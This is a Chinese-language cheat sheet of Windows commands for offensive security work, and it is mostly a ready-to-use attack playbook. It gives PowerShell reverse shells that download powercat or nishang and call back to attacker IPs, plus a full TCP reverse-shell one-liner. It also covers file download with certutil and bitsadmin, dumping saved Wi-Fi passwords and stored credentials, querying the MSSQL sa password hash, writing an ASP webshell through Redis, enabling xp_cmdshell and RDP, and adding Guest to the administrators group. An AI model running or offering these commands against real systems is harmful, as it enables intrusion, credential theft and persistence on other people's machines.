windows实战常用命令

windows实战常用命令

jar 解压jar包

jar -xvf xxx.jar ： 默认解压到当前目录

powershell调用curl

powershell -c curl http://www.baidu.com -UseBasicParsing

windows编为base64

certutil -encode a.txt encode.txt
certutil -decode encode.txt a.txt

windows输出散列值

certutil -hashfile 文件名 sha1/sha256/...

windows 特殊符号转义

利用`进行转义

windows 下载文件

#下载文件
certutil -urlcache -split -f http://example.com/a.txt

#下载文件并编码
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt

#适用于windows 7以上版本
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"

powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\phpstudy_pro\WWW\a.ps1')

windows反弹shell

#powershell反弹cmd,最好将github的下载地址替换为自己的vps
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd


#powershell反弹powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• powercat
• nishang
• revshells

系统错误代码

certutil -error 错误代码

获取wife密码信息

# 查看电脑连接过的所有wifi
netsh wlan show profiles
# 查看wifi信号为Aaron的密码
netsh wlan show profiles name="Aaron" key=clear
# CMD一键获取 所有连接过的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

windows中的压缩/解压命令

#压缩
makecab e:/test.txt e:/test.zip
#解压,文件夹必须存在
expand e:/test.zip e:/test.txt
expand -F:* test.zip E:\output\

windowsw全局搜索文件

for /r c:/ %i in (*flag*) do @echo %i
dir C:\ /b/s "flag"

redis写入文件

config get dir
config set dir /var/www/
set aa "\n\n\n<%execute request('chopper')%>\n\n\n"
config get dbfilename
config set dbfilename aa.asp
save

注册表开启3389

#开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

#关闭3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

# 查看开放端口
reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s

查询保存的登陆凭据

# 注册表查询
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

cmdkey /l

MSSQL命令执行

EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO

EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO
exec xp_cmdshell 'whoami'

MSSQL数据查询

#测试查询语句
select user,@@version

#查询所有数据库
select * from master.dbo.sysdatabases

#查询所有表名和字段名
select b.name tablename 
from sys.objects b where b.type='u' order by b.name

#获取某表中的字段，字段类型等　
SELECT * FROM INFORMATION_SCHEMA.columns WHERE TABLE_NAME='C_STUDYPROJECT'

#查询sa密码
select name,password from syslogins

Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa' 

mshta 命令

mshta在一般的应用中都不需要什么特别的参数，如：
mshta C:\test.hta
mshta "%cd%\test.html"
mshta http://www.google.com.hk
mshta about:blank
mshta vbscript:alert("hello")(window.close)
mshta vbscript:window.execScript("alert('hello world!');","javascript") 
mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs") 
mshta vbscript:msgbox("是否确定？",36,"确认")(window.close)
mshta javascript:alert('hello');window.close();
mshta vbscript:CreateObject("Shell.Application").MinimizeAll()(close)

windwos激活guest

#激活guest
net user Guest /active:yes
net localgroup administrators Guest /add
net user Guest Guest123



#添加用户
net user 用户名 密码 /add
#添加用户至管理员组
net localgroup administrators 用户名 /add
#添加用户至远程桌面组
net localgroup "Remote Desktop Users" 用户名 /add #此组中的成员被授予远程登录的权限
#允许修改密码
net user 用户名 /passwordchg:yes